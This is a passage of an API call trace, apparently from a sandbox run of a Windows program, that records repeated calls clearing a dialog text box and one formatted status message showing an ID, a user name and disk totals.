(hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.854] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0095.901] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0095.901] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.010] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.010] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.079] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.079] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.145] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.145] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.219] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.219] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.283] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.283] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.357] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.357] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.416] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.416] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.462] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.463] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.510] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.510] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.572] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.572] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.634] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.635] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.697] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.697] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.760] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.760] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.837] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.837] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.887] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.887] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0096.947] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0096.947] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.008] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.008] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.075] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.075] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.133] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.133] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.196] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.196] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.274] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.275] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.685] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.685] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.710] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.710] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.788] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.788] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.851] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.851] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0097.924] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0097.924] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.005] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.005] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.069] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.069] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.117] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.117] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.163] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.163] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.215] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.215] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.297] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.297] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.381] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.381] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.428] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.428] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.475] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.475] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.547] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.547] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.585] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.585] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.647] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.647] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.710] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.710] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.772] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.772] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.834] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.834] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.912] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.912] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0098.963] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0098.963] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.249] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.249] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.393] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.393] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.412] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.412] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.487] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.487] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.551] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.551] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.645] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.645] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.691] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.692] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.738] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.738] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.832] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.832] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.879] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.879] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0099.925] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0099.926] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.005] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.005] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.066] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.066] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.113] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.113] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.191] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.191] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.223] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.223] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.301] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.301] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.368] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.368] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.425] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.426] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.488] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.488] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.566] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.566] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0100.612] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0100.612] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.136] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.137] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.153] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0101.153] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0101.153] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0101.154] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0101.176] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.176] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.236] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.236] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.361] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.361] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.408] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.408] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.454] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.454] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.548] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.548] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.595] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.595] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.641] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.642] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.736] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.736] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.782] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.782] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.829] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.829] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.881] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.881] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0101.939] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0101.939] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.001] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.001] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.064] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.064] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.127] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.127] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.188] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.188] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.303] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.303] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.365] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.365] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.390] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.390] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.453] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.453] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.516] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.516] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.578] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.578] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.641] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.641] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.703] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.703] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.766] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.766] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.827] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.827] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.890] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.890] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0102.953] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0102.953] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.014] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.014] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.077] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.077] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.140] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.140] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.202] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.202] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.264] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.264] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.528] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.528] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.560] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.561] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.623] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.623] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.686] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.686] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.748] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.749] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.810] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.810] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.873] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.873] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.935] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.935] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0103.998] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0103.998] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.067] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.067] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.122] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.123] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.184] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.184] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.451] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.451] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.481] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.481] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.543] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.543] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.606] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.606] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.668] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.668] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.731] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.731] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.793] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.793] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.855] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.855] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0104.918] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0104.918] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.027] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.027] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.047] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.047] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.120] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.120] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.199] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.199] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.261] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.261] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.308] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.308] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.386] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.386] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.432] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.432] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.526] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.526] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.552] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.552] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.605] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.605] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.667] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.667] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.730] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.730] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.792] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.792] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.885] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.885] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.942] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.942] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0105.994] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0105.994] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.056] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.056] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.119] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.119] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.181] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.181] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.244] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.244] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.306] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.306] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.382] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.382] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.433] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.433] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.494] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.494] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.556] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.556] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.618] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.618] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.877] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.877] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.899] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.899] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0106.961] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0106.961] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.178] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.178] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.238] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.238] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.289] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.289] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.351] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.351] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.430] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.430] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.496] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.496] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.554] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.554] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.616] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.616] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.679] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.679] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.741] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.741] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.804] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.804] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.866] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.866] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.928] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.929] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0107.997] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0107.997] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.110] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.110] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.147] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.147] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.194] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.194] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.272] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.272] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.311] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.311] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.375] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.375] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.466] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.466] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.507] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.507] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.569] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.569] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.631] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.631] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.694] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.694] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.756] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.756] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0108.834] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0108.834] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.072] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.072] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.296] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.301] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.333] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.333] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.442] GetDlgItem 